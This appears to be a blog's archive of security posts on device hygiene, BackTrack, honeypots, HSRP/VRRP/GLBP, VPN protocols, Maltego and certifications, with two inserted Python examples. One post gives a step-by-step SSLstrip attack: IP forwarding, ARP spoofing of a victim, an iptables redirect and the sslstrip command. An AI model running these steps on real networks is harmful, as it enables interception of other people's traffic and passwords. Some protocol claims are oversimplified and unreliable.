Category Archives: security
I was thinking today about security. On the way to work I usually read a book that talks about it. My mind is becoming paranoid. Before, I was working at a remote site, far away from the crowded city, but now the situation is different: I am in a big city. When I go to work I see a lot of people with laptops, smartphones, tablets... and I only think about security.
Are all of those devices really secured? I'd like to think that at least the professionals have a device that is 100% secured. When I say secured... at least an antivirus and a password to unlock the device, or a password and some kind of encryption.
I believe that all the other devices, those of teenagers and people who are not using the technology for work, are not so protected. I saw some people unlocking the screen with a numeric code (that is good) and others with a pattern, which is not so good (basically because if you hold the phone against the light you can see the pattern).
With a simple test you could figure out how many devices are running with an open window; by that I mean with Bluetooth or wireless active. I know that for most of them it is better to keep the connections active because they save 5 seconds on switching them on (aaahhhhh!!!).
I remember my years as an administrator:
Me: – (looking away from the keyboard) please type your password.
User: – I wrote my user and password for you on a piece of paper. I'm going to put some order here in the office.
Back to handheld devices: there are many kinds of attacks on smartphones that could be used with bad intentions. There are tons of stupid apps that people download and don't update. This kind of app is a good starting point for an exploit.
Just some security advice:
- Put a password on your device (laptop, tablet, smartphone) to unlock it. You could forget it in a public place and anyone could sniff through your personal data.
- Don't save passwords. If someone gets access to your device he could spend some time on eBay with your account.
- If you have your passwords there, use software to encrypt the password database.
- Don't use weak passwords like... “123456”
When you go to the cash machine, you usually cover the keypad to avoid watchers. In the same way, when you unlock your device or read an email, try to do the same.
A good idea is to use polarised covers.
One of the best pen-test, forensic and general security tools is BackTrack.
February 5, 2006: BackTrack v1.0 Beta
May 26, 2006: The BackTrack project released its first non-beta version (1.0).
October 13, 2006: BackTrack 2 first public beta released.
November 19, 2006: BackTrack 2 second public beta released.
March 6, 2007: BackTrack 2 final released.
December 17, 2007: BackTrack 3 first beta released.
June 19, 2008: BackTrack 3 final released.
February 11, 2009: BackTrack 4 first beta released (it is now based on Debian).
June 19, 2009: BackTrack 4 pre-final release.
January 9, 2010: BackTrack 4 final release.
May 8, 2010: BackTrack 4 R1 release.
November 22, 2010: BackTrack 4 R2 release.
My first contact with this tool was in 2007, just because I was testing (I love testing new software, hardware... ;) ) different security tools. I remember that the first problem I got was with the WiFi card. My wireless chip was not supported in version 2. Luckily the new version was almost ready... I could play with my laptop 😉. It was useful at that moment.
What’s new in R2:
* Kernel 2.6.35.8 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.
The new BackTrack 4 Revision 1 is available for download.
New in this version:
* New kernel 2.6.34 to improve hardware compatibility and performance.
* All tools updated.
* New tool called “dragon” that lets the user modify BackTrack options from the command line.
* Added the option to replace the KDE environment with Fluxbox, offering a faster and more fluid environment.
* Implemented the rt28xx driver for Alfa AWUS050NH cards.
* If you download the VMware version, VMware Tools come integrated.
This is the final version of BackTrack 4 R1.
Please download it and test it!!!
Are you really sure that SSL connections are strong? I mean, that nobody can intercept your traffic, your passwords or even your bank account number. SSL is one of the world's most important encryption protocols, also used for VPNs.
There is a tool (SSLstrip) whose author claims to have used it to steal data from the most important and “safe” websites. This man is Moxie, a recognized security consultant.
1st – Configure IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
2nd – Perform a man-in-the-middle ARP attack
arpspoof -i eth0 -t VICTIM
3rd – Redirect traffic through iptables
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
4th – Start SSLstrip on the port used
python sslstrip.py -w archivo
Moxie’s website: http://www.thoughtcrime.org
A honeypot is a piece of software or a computer that simulates a vulnerable system to attract attackers. It is a sweet for hackers or people who want to play on the illegal side. This kind of “security system” (SS from now on) is used to learn attack methods, possible system failures and solutions to those failures. I say SS because, knowing the different patterns, you can shield your infrastructure to prevent this type of attack.
A honeypot is used to distract an attacker by making a system more attractive. For example, a computer called “server” is more appealing than one called “computer”; a file called “passwords” is more attractive than one called “images”. These are two examples out of thousands.
A honeypot is then used to monitor the network. When an attacker is trying to crack your system, you have an opportunity to learn more about the attacker.
For all of the above, a honeypot is a prevention and detection system.
Kinds of honeypots:
Depending on function:
Production: only capture information.
Research: capture extensive information; used by research, military or government organizations.
Depending on interaction with the attacker:
Low interaction: emulates services. The attacker thinks that he is cracking a system, but it is software that is emulating the service.
High interaction: the attacker interacts with it fully. Everything is real.
At the beginning these honeypots were in most cases expensive physical machines. Nowadays a honeypot can be a virtual machine in a virtual network with a virtual IP 🙂
I will test this kind of software and post my comments in the future.
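A minimal low-interaction honeypot of the kind described above, added here as an illustration (it is not code from the original post or from any honeypot product): it emulates an SMTP banner and a few verbs, executes nothing the visitor sends, and records every line as JSON. The banner host name, the port 2525 and the log file name honeypot.jsonl are assumptions for the example.

```python
import json
import socket
import threading
import time

FAKE_BANNER = b"220 mail.example.internal ESMTP ready\r\n"  # constructed; host name invented
LOG_FILE = "honeypot.jsonl"  # assumed log path, one JSON record per line

def handle_line(peer, data):
    """Canned reply plus log record for one client line. Nothing the client sends
    is executed; a few SMTP verbs get plausible answers so the visitor keeps talking."""
    line = data.decode("ascii", errors="replace").strip()
    verb = line.split(" ", 1)[0].upper() if line else ""
    if verb in ("HELO", "EHLO"):
        reply = b"250 mail.example.internal\r\n"
    elif verb in ("MAIL", "RCPT", "DATA"):
        reply = b"530 Authentication required\r\n"
    elif verb == "QUIT":
        reply = b"221 Bye\r\n"
    else:
        reply = b"502 Command not implemented\r\n"
    record = {"ts": round(time.time(), 3), "peer": "%s:%d" % peer[:2], "verb": verb,
              "raw": line[:200], "reply": reply.decode().strip()}  # cap stored input
    return reply, record

def serve_client(conn, peer, log_path=LOG_FILE, max_lines=20):
    """One session: banner, then answer and log line by line until QUIT,
    a closed socket, a timeout, or the per-session line cap."""
    records = []
    try:
        conn.settimeout(30)
        conn.sendall(FAKE_BANNER)
        for _ in range(max_lines):
            data = conn.recv(1024)
            if not data:
                break
            reply, record = handle_line(peer, data)
            records.append(record)
            if log_path:
                with open(log_path, "a") as fh:
                    fh.write(json.dumps(record) + "\n")
            conn.sendall(reply)
            if record["verb"] == "QUIT":
                break
    except (socket.timeout, OSError):
        pass
    finally:
        conn.close()
    return records

def run(bind="0.0.0.0", port=2525):
    """Listen on an unprivileged port (redirect 25 here with a firewall rule if needed)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind, port))
    srv.listen(5)
    while True:
        conn, peer = srv.accept()
        threading.Thread(target=serve_client, args=(conn, peer), daemon=True).start()
```

Call run() to start listening; the JSON lines in the log are what you later study to learn the visitor's tools and patterns.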
I am passionate about security. First I would like to think about the concept.
What does “high availability” mean?
You are responsible for a small network and you have a spare server, router, switch and some computers. This cannot be considered high availability, and it is not efficient either. High availability would be having two routers configured so that, in case one breaks, all traffic is routed by the other one. The administrator should receive an alarm and the broken appliance should be replaced. This can be a “basic” scenario. It is the same for servers and switches.
The best scenario could be:
*Two different Internet providers.
*A pair of good routers, each one with redundant power and configured with the HSRP, VRRP or GLBP protocols.
*A server cluster environment to prevent a failure of the system.
*All devices connected to separate power lines.
*A UPS (uninterruptible power supply) protecting the core of the company.
If finally all of the above can be duplicated in another office... it means that the information you are handling is toooooo important 😉
I do not know if I have skipped any concept.
This is the theory, but it depends on the needs of the company. If the company can afford an hour or a day of service loss, then all these measures are not necessary. However, if the company sells articles on a website, each minute is important because the service would not be good for the customer.
There are other extreme cases. I read a whitepaper in which the author was talking about the systems used by the military forces in aircraft. The systems used to control those jets are the best redundancy example: they use 3 different systems with 3 different architectures and 3 different operating systems. He did not talk about power, but I think that it is redundant too 😉
Now let's start to talk about redundancy protocols.
Hot Standby Router Protocol (HSRP). Provides default gateway redundancy using one active and one standby router. That means: one router is carrying all the load and, in case it fails, the standby router becomes the active router. When the service is re-established, it goes back to the standby router as before. HSRP sends its hello messages by multicast to the address 224.0.0.2 on UDP port 1985, to the other HSRP-enabled routers, defining the priority between the routers. The primary router, the one with the highest configured priority, acts as a virtual router with a pre-defined gateway IP and responds to ARP requests from machines connected to the LAN with the MAC address 0000.0c07.acXX, where XX is the group ID in hex. If the primary router fails, the router with the next-highest priority takes over the gateway IP and answers ARP requests with the same MAC address, thus achieving transparent default gateway fail-over.
HSRP and VRRP are not routing protocols as they do not advertise IP routes or affect the routing table in any way.
HSRP and VRRP on some routers have the ability to trigger a failover if one or more interfaces on the router go down. This can be useful for dual branch routers each with a single serial link back to the head end. If the serial link of the primary router goes down, you would want the backup router to take over the primary functionality and thus retain connectivity to the head end.
Virtual Router Redundancy Protocol (VRRP). An open-standard alternative to Cisco's HSRP, providing the same functionality. It is designed to increase the availability of the default gateway serving hosts on the same subnet. This increased reliability is achieved by advertising a “virtual router” (an abstract representation of master and backup routers acting as a group) as the default gateway to the hosts instead of one physical router. Two or more physical routers are then configured to stand for the virtual router, with only one doing the actual routing at any given time. If the physical router that is currently routing the data on behalf of the virtual router fails, an arrangement is made for another physical router to automatically replace it. The physical router that is currently forwarding data on behalf of the virtual router is called the master router. The physical routers standing by to take over from the master router in case something goes wrong are called backup routers.
A virtual router must use 00-00-5E-00-01-XX as its Media Access Control (MAC) address. The last byte of the address (XX) is the Virtual Router IDentifier (VRID), which is different for each virtual router in the network. This address is used by only one physical router at a time, and that router replies with this MAC address when an ARP request is sent for the virtual router's IP address. The physical routers within the virtual router communicate among themselves using packets with the multicast IP address 224.0.0.18 and IP protocol number 112.
Routers have a priority between 1 and 255, and the router with the highest priority becomes the master. When a planned withdrawal of a master router is to take place, its priority can be lowered, which means a backup router will pre-empt the master router status rather than having to wait for the hold time to expire. This reduces the black hole period.
Gateway Load Balancing Protocol (GLBP). Supports arbitrary load balancing in addition to redundancy across gateways. It is a Cisco proprietary protocol that attempts to overcome the limitations of existing redundant router protocols by adding basic load balancing functionality.
In addition to being able to set priorities on different gateway routers, GLBP also allows a weighting parameter to be set. Based on this weighting (compared to others in the same virtual router group), ARP requests will be answered with MAC addresses pointing to different routers. Thus, load balancing is not based on traffic load, but rather on the number of hosts that will use each gateway router. By default GLBP load balances in round-robin fashion.
GLBP elects one AVG (Active Virtual Gateway) for each group. The other group members act as backups in case of AVG failure. In case there are more than two members, the second-best AVG is placed in the Standby state and all other members are placed in the Listening state. This is monitored using the hello and holdtime timers, which are 3 and 10 seconds by default. The elected AVG then assigns a virtual MAC address to each member of the GLBP group, including itself, thus enabling AVFs (Active Virtual Forwarders). Each AVF assumes responsibility for forwarding packets sent to its virtual MAC address. There can be up to four active AVFs at the same time.
By default, GLBP routers use the local multicast address 224.0.0.102 to send hello packets to their peers every 3 seconds over UDP port 3222 (source and destination).
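An added example (not from the original post or from any vendor) that puts the HSRP, VRRP and GLBP facts above to defensive use: it classifies hello traffic by its destination multicast address and protocol/port (224.0.0.2 UDP 1985, 224.0.0.18 protocol 112, 224.0.0.102 UDP 3222 are the standard assignments), decodes the HSRP v1 and VRRP virtual MAC formats into group IDs, runs the priority election, and checks that a segment's default gateway really resolves to a virtual MAC. The router names, IPs and ARP table are constructed.

```python
import re
import ipaddress

# Well-known virtual MAC prefixes (HSRP version 1 and VRRP, as in the text).
VIRTUAL_MAC_PREFIXES = {"00000c07ac": "HSRP", "00005e0001": "VRRP"}
# Control-plane signatures: (destination IP, IP protocol, UDP port or None).
# HSRP and GLBP ride on UDP (protocol 17); VRRP is its own IP protocol, 112.
FHRP_SIGNATURES = {
    ("224.0.0.2", 17, 1985): "HSRP",
    ("224.0.0.18", 112, None): "VRRP",
    ("224.0.0.102", 17, 3222): "GLBP",
}

def normalize_mac(mac):
    """Accept 0000.0c07.ac0a, 00-00-5E-00-01-01 or 00:11:... and return 12 hex digits."""
    digits = re.sub(r"[^0-9a-fA-F]", "", mac).lower()
    if len(digits) != 12:
        raise ValueError("not a MAC address: %r" % mac)
    return digits

def fhrp_virtual_mac(mac):
    """Return (protocol, group id) if mac is a well-known virtual MAC, else None."""
    digits = normalize_mac(mac)
    proto = VIRTUAL_MAC_PREFIXES.get(digits[:10])
    return (proto, int(digits[10:], 16)) if proto else None

def classify_fhrp_packet(dst_ip, ip_proto, dst_port=None):
    """Name the redundancy protocol a hello packet belongs to, or None."""
    if ip_proto != 17:
        dst_port = None  # a port only makes sense for UDP
    return FHRP_SIGNATURES.get((dst_ip, ip_proto, dst_port))

def elect_master(routers):
    """routers: list of (name, priority 1-255, interface IP). Highest priority wins;
    on a tie the highest IP wins. Lowering the current master's priority (the
    planned-withdrawal trick from the text) makes a backup win this election."""
    best = max(routers, key=lambda r: (r[1], ipaddress.ip_address(r[2])))
    return best[0]

def check_gateway_arp(gateway_ip, arp_table):
    """Defender check: on a redundant-gateway segment the default gateway's ARP
    entry should be a virtual MAC. A physical or unknown MAC means either the
    redundancy group is misconfigured or something else is answering for it."""
    mac = arp_table.get(gateway_ip)
    if mac is None:
        return False, "no ARP entry for %s" % gateway_ip
    hit = fhrp_virtual_mac(mac)
    if hit is None:
        return False, "%s resolves to non-virtual MAC %s" % (gateway_ip, mac)
    return True, "%s served by %s group %d" % (gateway_ip, hit[0], hit[1])
```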
There are different VPN (Virtual Private Network) protocols. The most common are PPTP, L2TP, IPSec and TLS.
PPTP (Point-to-Point Tunneling Protocol). This protocol was developed by Microsoft in conjunction with other technology companies. It is the best supported by Microsoft clients. PPTP is an extension of PPP and for that reason uses the same types of authentication (PAP, SPAP, CHAP, MS-CHAP, EAP). The big problem with this protocol is that it cannot provide encryption. Microsoft resolved that issue by using the protocol in conjunction with MPPE (Microsoft Point-to-Point Encryption) to provide a secure VPN.
In most Microsoft operating systems it can be deployed without any client software installation, and it is available for Linux and some Mac OS versions. PPTP is supported by Cisco PIX, SonicWall and most firewall appliances.
L2TP. The acronym means Layer 2 Tunneling Protocol. This protocol was developed by Microsoft in collaboration with Cisco, combining features of PPTP with those of Cisco's proprietary Layer 2 Forwarding (L2F) protocol. It can be used on non-IP networks such as ATM, Frame Relay and X.25. It is supported by major firewall products like ISA Server, Check Point and Cisco PIX, for example.
IP Security (IPSec), with the Encapsulating Security Payload (ESP) protocol, provides encryption for L2TP tunnels. It requires the use of digital certificates. User authentication is performed via the same PPP authentication mechanisms as PPTP, but L2TP also provides computer authentication.
L2TP provides data integrity (protection against modification of the data between the time it left the sender and the time it reached the recipient), authentication of origin (confirmation that the user who claims to have sent the data really did) and replay protection (keeps a hacker from being able to capture data that is sent, such as the sending of credentials, and then “replay” it to “trick” the server). On the other hand, the overhead involved in providing this extra security can result in slightly slower performance than PPTP.
By itself, this protocol does not provide any encryption or confidentiality.
IPSec. As its name implies, it is an IP security protocol. It encrypts and authenticates each packet. It operates at layer 3 (network) of the OSI model.
This is one of the most preferred VPN protocols for site-to-site connections. Many hardware VPN appliances use an implementation of IPSec (Cisco VPN Concentrators and PIX, SonicWall, WatchGuard...).
It requires that the VPN client computers have client software installed. It is useful for users that are not in the office (remote users). If it is used in tunnel mode, it secures packets transmitted between two gateways, which is normal practice in VPNs between branch offices.
IPSec is implemented by a group of cryptographic protocols to ensure flow control, mutual authentication and the establishment of cryptographic parameters. The IP security architecture uses SAs (Security Associations) together with key-exchange protocols like IKE and IKEv2 (Internet Key Exchange) or KINK (Kerberized Internet Negotiation of Keys).
There are two different modes: transport and tunnel.
Transport mode: only the payload (the data sent) is encrypted or authenticated.
Tunnel mode: the complete packet is encrypted or authenticated.
Transport Layer Security (TLS). It is the successor of SSL (Secure Sockets Layer). It is a protocol for which you do not need additional software installed on your computer: it uses the web browser as the client application. TLS provides endpoint authentication using cryptography. TLS authentication is unilateral, which means the server is authenticated but not vice versa.
When a TLS or SSL connection is established, the client and server negotiate a CipherSuite, exchanging CipherSuite codes in the client hello and server hello messages, which specifies the combination of cryptographic algorithms to be used for the connection. The key exchange and authentication algorithms are typically public-key algorithms, or, as in TLS-PSK, pre-shared keys can be used. The message authentication codes are built from cryptographic hash functions using the HMAC construction for TLS, and a non-standard pseudorandom function for SSL.
I will explain IPSec and TLS protocols in separate posts.
As I said some days ago, “I will test BackTrack 4”. So, I did it!
Let me tell you that I have only been testing the Maltego tool. Oh my Goooooood!!!!! It's amazing. This is a forensic and pen-test tool. If you want to check a domain, website or whatever in a network, this tool can help you. It is graphical and you can see the evolution easily.
For example: you want to know, from outside, which information about your company people can get. This is an example:
As you can see, there is a lot of data that maybe you don't want to be available on the Internet. This is only the start 😦 because Maltego can get the following information:
* E-mail addresses
* IP addresses, even if you have more than one
* Net block
* Phone number (in case it is placed on the website or in another kind of document accessible from outside)
* MX record
* NS record
* Domain (you know an IP address and you want to know all the domains behind this IP)
* People (social networks)
There is a lot of info... so, if you think that your network is safe and people can only see your website... check this tool first 🙂
This is the user guide: http://ctas.paterva.com/view/Userguide
Once you have tested it, you can draw your own conclusions.
Recommended 100%!!
I'm going to speak about my certification path.
I'm currently CCSP (Cisco Certified Security Professional). To achieve this certification I studied for around a year. I was working in a small company configuring and installing routers, switches and other kinds of network devices. I started by studying the basic Cisco certification, which is CCNA (Cisco Certified Network Associate). After that, I thought: “which field would you like to study?” At that moment I was starting to get into security. So I chose CCSP, because the other path, CCNP (Cisco Certified Network Professional), is related to networks and it didn't interest me.
Studying for this certification, I discovered my passion: SECURITY SYSTEMS. But first, let me explain that “security” covers a lot of fields and, if you really love it, you should choose your path. In my case, network security systems. That means routers, switches, firewalls, IPS, IDS, sniffers, scanners...
Some people get this certification and then think: “This is the end of my path; from now on I'm a security expert”. I'm so sorry, but it is not true. This is one part of your race. This can be the start. In IT you need to study every year if you want to stay up to date.
I'm currently studying for the CCNP (Cisco Certified Network Professional) and I think that in no more than 2 months I will get it! 😉
Cisco is not the only way, but in my case it was my start. In my opinion, if you want to be a security expert, you should try:
* CISSP Certified Information Systems Security Professional
* CISA Certified Information Systems Auditor
One of these is the best path because it is not focused on a technology like Cisco, Juniper or another vendor.
There are more certifications, but not so technical.
Now it is your decision!